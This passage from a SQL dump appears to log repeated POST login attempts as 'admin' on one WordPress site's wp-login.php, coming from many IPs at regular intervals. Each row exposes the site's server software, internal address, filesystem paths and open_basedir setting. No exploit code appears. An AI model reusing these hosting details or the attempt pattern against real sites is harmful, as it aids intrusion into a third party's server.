form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746903723.098419;s:12:\"REQUEST_TIME\";i:1746903723;}}','162.0.232.248',0,'2025-05-11 00:32:04','1970-01-01 00:00:00'),(95350,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50726\";s:11:\"REMOTE_ADDR\";s:13:\"5.101.157.127\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746904191.1784301;s:12:\"REQUEST_TIME\";i:1746904191;}}','5.101.157.127',0,'2025-05-11 00:39:52','1970-01-01 00:00:00'),(95351,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33894\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.132.183\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746904655.699435;s:12:\"REQUEST_TIME\";i:1746904655;}}','66.29.132.183',0,'2025-05-11 00:47:37','1970-01-01 00:00:00'),(95352,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53388\";s:11:\"REMOTE_ADDR\";s:14:\"188.245.76.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746905114.212867;s:12:\"REQUEST_TIME\";i:1746905114;}}','188.245.76.244',0,'2025-05-11 00:55:15','1970-01-01 00:00:00'),(95353,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41010\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.95.176\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746906025.336324;s:12:\"REQUEST_TIME\";i:1746906025;}}','157.230.95.176',0,'2025-05-11 01:10:27','1970-01-01 00:00:00'),(95354,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57390\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.232.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746906481.0162499;s:12:\"REQUEST_TIME\";i:1746906481;}}','162.0.232.89',0,'2025-05-11 01:18:02','1970-01-01 00:00:00'),(95355,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52240\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746906926.58987;s:12:\"REQUEST_TIME\";i:1746906926;}}','162.0.209.103',0,'2025-05-11 01:25:28','1970-01-01 00:00:00'),(95356,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32822\";s:11:\"REMOTE_ADDR\";s:14:\"222.255.214.45\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746907366.0390069;s:12:\"REQUEST_TIME\";i:1746907366;}}','222.255.214.45',0,'2025-05-11 01:32:47','1970-01-01 00:00:00'),(95357,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55530\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746907800.593493;s:12:\"REQUEST_TIME\";i:1746907800;}}','162.0.232.248',0,'2025-05-11 01:40:02','1970-01-01 00:00:00'),(95358,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59976\";s:11:\"REMOTE_ADDR\";s:12:\"209.145.51.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746908228.2693379;s:12:\"REQUEST_TIME\";i:1746908228;}}','209.145.51.5',0,'2025-05-11 01:47:09','1970-01-01 00:00:00'),(95359,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50492\";s:11:\"REMOTE_ADDR\";s:13:\"184.94.213.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746908659.804029;s:12:\"REQUEST_TIME\";i:1746908659;}}','184.94.213.64',0,'2025-05-11 01:54:21','1970-01-01 00:00:00'),(95360,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 